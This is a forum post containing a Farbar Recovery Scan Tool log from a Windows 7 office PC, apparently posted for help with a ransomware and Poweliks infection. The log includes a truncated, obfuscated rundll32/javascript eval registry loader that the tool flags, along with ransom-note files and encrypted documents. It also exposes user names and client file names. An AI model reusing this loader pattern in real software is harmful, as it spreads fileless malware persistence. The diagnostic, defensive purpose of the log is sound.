Adam, please see the following log for your information:
FRST.txt
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 07-01-2015
Ran by georgepc (administrator) on GEORGEPAN-PC on 07-01-2015 13:43:13
Running from C:\Users\georgepc\Desktop\Geekstogo
Loaded Profile: georgepc (Available profiles: GeorgePan & georgepc & Administrator)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Atheros Commnucations) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AdminService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Thomson Reuters) C:\Windows\csasvc.exe
(Thomson Reuters) C:\Windows\csifcsvc.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\ramaint.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
(Atheros) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\Ath_CoexAgent.exe
(Atheros) C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(SoftThinks SAS) C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\outlook.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\winword.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\System32\mspaint.exe
(Atheros Commnucations) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
(Google Inc.) C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dpnsvr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3653136 2014-11-09] (AVG Technologies CZ, s.r.o.)
Winlogon\Notify\GoToAssist Express Customer: C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_winlogonx64.dll (Citrix Online, LLC)
HKU\S-1-5-21-3959093455-1914111138-4206043169-1001\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2014-07-23] (Google Inc.)
HKU\S-1-5-21-3959093455-1914111138-4206043169-1001\...\RunOnce: [Uninstall C:\Users\georgepc\AppData\Local\Microsoft\SkyDrive\17.0.4023.1211_1\amd64] => C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\georgepc\AppData\Local\Microsoft\SkyDrive\17.0.4023.1211_1\amd64"
HKU\S-1-5-21-3959093455-1914111138-4206043169-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
ShellIconOverlayIdentifiers: [DBARFileBackuped] -> {831cebdd-6baf-4432-be76-9e0989c14aef} => C:\Windows\system32\mscoree.dll (Microsoft Corporation)
ShellIconOverlayIdentifiers: [DBARFileNotBackuped] -> {275e4fd7-21ef-45cf-a836-832e5d2cc1b3} => C:\Windows\system32\mscoree.dll (Microsoft Corporation)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll (Microsoft Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\IEPlugIn.dll (Atheros Commnucations)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL (Microsoft Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKU\S-1-5-21-3959093455-1914111138-4206043169-1001 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.9.1
FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll (Foxit Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3959093455-1914111138-4206043169-1001: @citrixonline.com/appdetectorplugin -> C:\Users\georgepc\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
Chrome:
=======
==================== Services (Whitelisted) =================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3488784 2014-11-09] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [298080 2014-11-09] (AVG Technologies CZ, s.r.o.)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2449592 2014-11-12] (Microsoft Corporation)
R2 CSAPrintService; C:\Windows\csasvc.exe [115712 2013-10-30] (Thomson Reuters) [File not signed]
R2 FCPrintService; C:\Windows\csifcsvc.exe [115712 2013-10-30] (Thomson Reuters) [File not signed]
S3 GoToAssist Remote Support Customer; C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_service.exe [610888 2014-10-03] (Citrix Online, LLC)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [15344 2013-02-06] (Intel Corporation)
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887232 2014-01-31] (Intel® Corporation)
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [131544 2014-02-19] (Intel Corporation)
S3 iumsvc; C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe [174368 2014-01-17] ()
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [154584 2014-02-19] (Intel Corporation)
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe [376168 2014-10-31] (LogMeIn, Inc.)
R2 LMIMaint; C:\Program Files (x86)\LogMeIn\x64\RaMaint.exe [226152 2014-10-31] (LogMeIn, Inc.)
R2 LogMeIn; C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe [407424 2014-10-31] (LogMeIn, Inc.)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2009-05-14] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2009-05-14] (Hewlett-Packard) [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [224840 2013-05-10] (Realtek Semiconductor)
R2 SftService; C:\Program Files (x86)\Dell Backup and Recovery\sftservice.exe [1915920 2014-04-04] (SoftThinks SAS)
R2 ZAtheros Bt and Wlan Coex Agent; C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\Ath_CoexAgent.exe [327296 2012-12-27] (Atheros)
R2 ZAtheros Wlan Agent; C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe [81536 2012-12-25] (Atheros)
S2 McAPExe; "C:\Program Files\McAfee\MSC\McAPExe.exe" [X]
==================== Drivers (Whitelisted) ====================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [153368 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [263960 2014-10-29] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [190744 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [243480 2014-08-28] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [313624 2014-07-18] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [124184 2014-10-05] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [31512 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [274200 2014-10-10] (AVG Technologies CZ, s.r.o.)
R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [28656 2013-01-15] (Intel Corporation)
R2 LMIInfo; C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys [16056 2014-10-31] (LogMeIn, Inc.)
S4 LMIRfsClientNP; No ImagePath
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [116736 2014-02-19] (Intel Corporation)
S3 SPPD; \??\C:\Windows\system32\drivers\SPPD.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
==================== One Month Created Files and Folders ========
(If an entry is included in the fixlist, the file\folder will be moved.)
2015-01-07 13:40 - 2015-01-07 13:43 - 00000000 ____D () C:\FRST
2015-01-07 13:39 - 2015-01-07 13:43 - 00000000 ____D () C:\Users\georgepc\Desktop\Geekstogo
2015-01-06 19:08 - 2015-01-07 13:35 - 00000000 ____D () C:\Users\georgepc\AppData\Roaming\Siegazsi
2015-01-06 19:08 - 2015-01-07 13:00 - 00000826 _____ () C:\Windows\Tasks\Security Center Update - 3401159158.job
2015-01-06 19:08 - 2015-01-06 19:08 - 00003840 _____ () C:\Windows\System32\Tasks\Security Center Update - 3401159158
2015-01-06 13:42 - 2015-01-06 13:42 - 00002285 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\WinZip.lnk
2015-01-06 13:42 - 2015-01-06 13:42 - 00002279 _____ () C:\Users\Public\Desktop\WinZip.lnk
2015-01-06 13:42 - 2015-01-06 13:42 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip
2015-01-06 13:41 - 2015-01-06 13:42 - 00000000 ____D () C:\Users\Administrator\AppData\Local\WinZip
2015-01-06 13:41 - 2015-01-06 13:42 - 00000000 ____D () C:\ProgramData\WinZip
2015-01-06 13:41 - 2015-01-06 13:41 - 00000000 ____D () C:\Program Files\WinZip
2015-01-06 13:40 - 2015-01-06 13:40 - 00906024 _____ ( ) C:\Users\Administrator\Downloads\winzip19.exe
2015-01-06 13:30 - 2015-01-06 13:31 - 00000000 ____D () C:\Users\Administrator\Desktop\GP_Ransom
2015-01-06 13:26 - 2015-01-06 13:26 - 00019822 _____ () C:\Users\Administrator\Desktop\dds.txt
2015-01-06 13:26 - 2015-01-06 13:26 - 00005473 _____ () C:\Users\Administrator\Desktop\attach.txt
2015-01-06 13:22 - 2015-01-06 13:20 - 00688992 ____R (Swearware) C:\Users\Administrator\Desktop\dds.com
2015-01-06 13:20 - 2015-01-06 13:20 - 00688992 _____ (Swearware) C:\Users\Administrator\Downloads\dds.com
2015-01-06 13:19 - 2015-01-06 13:19 - 00000000 ____D () C:\Users\Administrator\AppData\Roaming\Macromedia
2015-01-06 13:18 - 2015-01-06 13:18 - 00000000 __SHD () C:\Users\Administrator\AppData\Local\EmieUserList
2015-01-06 13:18 - 2015-01-06 13:18 - 00000000 __SHD () C:\Users\Administrator\AppData\Local\EmieSiteList
2015-01-06 13:18 - 2015-01-06 13:18 - 00000000 __SHD () C:\Users\Administrator\AppData\Local\EmieBrowserModeList
2015-01-05 18:51 - 2015-01-05 18:51 - 00001660 _____ () C:\Users\Public\Desktop\Recuva.lnk
2015-01-05 18:51 - 2015-01-05 18:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Recuva
2015-01-05 18:51 - 2015-01-05 18:51 - 00000000 ____D () C:\Program Files\Recuva
2015-01-05 18:27 - 2015-01-06 12:47 - 00000000 ____D () C:\Windows\Microsoft Antimalware
2015-01-05 18:22 - 2015-01-05 18:23 - 00344064 _____ () C:\Users\georgepc\Documents\Database2.accdb
2015-01-05 18:22 - 2015-01-05 18:22 - 00344064 _____ () C:\Users\georgepc\Documents\Database1.accdb
2015-01-05 18:14 - 2015-01-05 18:14 - 00000000 ____D () C:\Windows\pss
2015-01-05 18:09 - 2015-01-05 18:09 - 00000000 ____D () C:\cd871ceb1dc9e339b4fc59bb388a
2015-01-05 17:20 - 2015-01-05 17:20 - 00023552 _____ () C:\Users\georgepc\AppData\Local\kenxoil.dll
2015-01-05 12:15 - 2015-01-05 12:15 - 00015872 _____ () C:\Users\georgepc\AppData\Roaming\cowitches.d
2015-01-03 21:35 - 2015-01-07 13:42 - 00001688 _____ () C:\Users\georgepc\Desktop\Computer.lnk
2015-01-03 21:35 - 2015-01-07 13:42 - 00000288 _____ () C:\Users\georgepc\AppData\Roaming\B268479A.reg
2015-01-03 21:35 - 2015-01-06 19:00 - 00928768 _____ () C:\Users\georgepc\AppData\Roaming\ScanDisc.exe
2015-01-03 21:33 - 2015-01-03 21:33 - 00000000 ____D () C:\Users\georgepc\Desktop\2007 Extension 7004 & 4868
2015-01-03 20:54 - 2015-01-03 20:56 - 00000000 ____D () C:\Users\georgepc\Desktop\temptemp
2015-01-03 20:40 - 2015-01-03 20:40 - 00120864 _____ () C:\Users\Administrator\AppData\Local\GDIPFONTCACHEV1.DAT
2015-01-03 20:40 - 2015-01-03 20:40 - 00000000 ____D () C:\Users\Administrator\AppData\Roaming\Intel Corporation
2015-01-03 20:39 - 2015-01-03 20:39 - 00000000 ____D () C:\Users\Administrator\AppData\Roaming\AVG2015
2015-01-03 20:39 - 2015-01-03 20:39 - 00000000 ____D () C:\Users\Administrator\AppData\Roaming\Atheros
2015-01-03 20:39 - 2015-01-03 20:39 - 00000000 ____D () C:\Users\Administrator\AppData\Local\LogMeIn
2015-01-03 20:39 - 2015-01-03 20:39 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Avg2015
2015-01-03 20:38 - 2015-01-03 20:38 - 00001415 _____ () C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-01-03 20:38 - 2015-01-03 20:38 - 00000000 ____D () C:\Users\Administrator\AppData\Roaming\Adobe
2015-01-03 20:37 - 2015-01-03 20:38 - 00000000 ____D () C:\Users\Administrator
2015-01-03 20:37 - 2015-01-03 20:37 - 00000020 ___SH () C:\Users\Administrator\ntuser.ini
2015-01-03 20:37 - 2014-08-14 08:56 - 00000000 ____D () C:\Users\Administrator\AppData\Roaming\TuneUp Software
2015-01-03 20:37 - 2014-07-26 15:15 - 00002106 _____ () C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft OneDrive.lnk
2015-01-03 20:37 - 2009-07-13 20:54 - 00000000 ___RD () C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-01-03 20:37 - 2009-07-13 20:49 - 00000000 ___RD () C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-01-02 22:57 - 2015-01-02 22:57 - 06220854 _____ () C:\Users\georgepc\Documents\Decrypt All Files wymfrlk.bmp
2015-01-02 22:57 - 2015-01-02 22:57 - 00001240 _____ () C:\Users\georgepc\Documents\Decrypt All Files wymfrlk.txt
2015-01-02 08:32 - 2014-12-31 19:28 - 00013408 _____ () C:\Users\georgepc\Documents\Copy of 2014 Dr Noralahi income tax withholding (2).XLSX.wymfrlk
2014-12-31 16:05 - 2015-01-02 22:57 - 04611046 _____ () C:\ProgramData\odxwyle.html
2014-12-31 08:58 - 2014-12-30 15:17 - 08447865 _____ (AME Software Products, Inc. ) C:\Users\georgepc\Desktop\ame_update_2015_v2_3_1.exe
2014-12-30 13:12 - 2014-12-30 13:12 - 00003038 _____ () C:\Windows\System32\Tasks\dvwgmok
2014-12-24 20:44 - 2014-12-24 20:44 - 00003886 _____ () C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2014-12-24 20:33 - 2015-01-07 03:40 - 00000000 ____D () C:\ProgramData\lmyrj
2014-12-24 20:29 - 2014-12-24 20:36 - 00000000 ____D () C:\ProgramData\AojahEzfec
2014-12-18 13:47 - 2014-12-18 13:47 - 00001658 _____ () C:\Users\georgepc\Desktop\eFileCabinet 2014.lnk
2014-12-18 12:36 - 2014-12-18 12:24 - 00005522 _____ () C:\Users\georgepc\Desktop\Copy of UT13_ClientContact business - Bookkeeping.csv
2014-12-18 12:36 - 2014-12-18 12:24 - 00004206 _____ () C:\Users\georgepc\Desktop\Copy of UT13_ClientContact business - Payroll.csv
2014-12-17 11:01 - 2014-12-12 21:09 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-12-17 11:01 - 2014-12-12 19:33 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-12-16 08:52 - 2014-12-16 08:52 - 00000029 _____ () C:\Users\georgepc\Foxit Reader SDK ActiveX.ini
2014-12-15 14:58 - 2014-12-15 14:58 - 00001440 _____ () C:\Users\georgepc\Desktop\0224SWM.ASC
2014-12-15 12:23 - 2014-12-15 12:23 - 00000641 _____ () C:\Users\georgepc\Desktop\0224DPO.ASC
2014-12-15 11:56 - 2014-12-15 11:56 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\eFileCabinet 2014
2014-12-15 11:50 - 2014-12-15 11:50 - 00000000 ____D () C:\Users\georgepc\AppData\Roaming\eFileCabinet
2014-12-15 11:50 - 2014-11-06 11:32 - 00000448 _____ () C:\Users\georgepc\Documents\ChatLog NorCal Meeting w_Steve R_ 2014_11_06 11_32.RTF.wymfrlk
2014-12-15 11:48 - 2014-12-15 12:08 - 00014337 _____ () C:\Users\georgepc\Desktop\UT13_ClientContact.csv
2014-12-15 11:44 - 2014-12-15 11:45 - 00001109 _____ () C:\Users\georgepc\Desktop\0224tt.csv
2014-12-15 11:41 - 2014-12-15 11:41 - 00001008 _____ () C:\Users\georgepc\Desktop\0224TT.ASC
2014-12-12 12:01 - 2014-12-12 12:01 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2014-12-12 12:00 - 2014-12-12 12:00 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2014-12-12 12:00 - 2014-12-12 12:00 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight
2014-12-12 11:40 - 2014-12-12 11:40 - 00065630 _____ () C:\Users\georgepc\Desktop\ame payroll client.html
2014-12-12 09:36 - 2014-12-12 09:36 - 03371604 _____ () C:\Users\georgepc\Desktop\AttendeeViewerImage007.bmp
2014-12-12 09:36 - 2014-12-12 09:36 - 03371604 _____ () C:\Users\georgepc\Desktop\AttendeeViewerImage006.bmp
2014-12-12 09:36 - 2014-12-12 09:36 - 03371604 _____ () C:\Users\georgepc\Desktop\AttendeeViewerImage005.bmp
2014-12-12 09:35 - 2014-12-12 09:35 - 03371604 _____ () C:\Users\georgepc\Desktop\AttendeeViewerImage004.bmp
2014-12-12 09:35 - 2014-12-12 09:35 - 03371604 _____ () C:\Users\georgepc\Desktop\AttendeeViewerImage003.bmp
2014-12-12 09:35 - 2014-12-12 09:35 - 03371604 _____ () C:\Users\georgepc\Desktop\AttendeeViewerImage002.bmp
2014-12-12 09:35 - 2014-12-12 09:35 - 03371604 _____ () C:\Users\georgepc\Desktop\AttendeeViewerImage001.bmp
2014-12-10 03:16 - 2014-12-10 03:16 - 00000000 ____D () C:\Windows\system32\appraiser
2014-12-10 03:00 - 2014-10-17 18:05 - 04121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-12-10 03:00 - 2014-10-17 17:33 - 03209728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-12-10 03:00 - 2014-07-06 18:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-12-10 03:00 - 2014-07-06 18:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-12-10 03:00 - 2014-07-06 18:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-12-10 03:00 - 2014-07-06 18:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-12-10 03:00 - 2014-07-06 17:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2014-12-10 03:00 - 2014-07-06 17:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2014-12-10 03:00 - 2014-07-06 17:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2014-12-10 03:00 - 2014-07-06 17:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2014-12-09 13:00 - 2014-12-03 18:50 - 00830976 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2014-12-09 13:00 - 2014-12-03 18:50 - 00741376 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2014-12-09 13:00 - 2014-12-03 18:50 - 00413184 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-12-09 13:00 - 2014-12-03 18:50 - 00396800 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2014-12-09 13:00 - 2014-12-03 18:50 - 00227328 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-12-09 13:00 - 2014-12-03 18:50 - 00192000 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2014-12-09 13:00 - 2014-12-03 18:44 - 01083392 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-12-09 13:00 - 2014-12-01 15:28 - 01232040 _____ (Microsoft Corporation) C:\Windows\system32\aitstatic.exe
2014-12-09 13:00 - 2014-11-26 17:43 - 00389296 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-12-09 13:00 - 2014-11-26 17:10 - 00342200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-12-09 13:00 - 2014-11-21 19:13 - 25059840 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-12-09 13:00 - 2014-11-21 19:06 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-12-09 13:00 - 2014-11-21 19:06 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-12-09 13:00 - 2014-11-21 18:50 - 00580096 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-12-09 13:00 - 2014-11-21 18:50 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-12-09 13:00 - 2014-11-21 18:49 - 02885120 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-12-09 13:00 - 2014-11-21 18:49 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-12-09 13:00 - 2014-11-21 18:48 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-12-09 13:00 - 2014-11-21 18:41 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
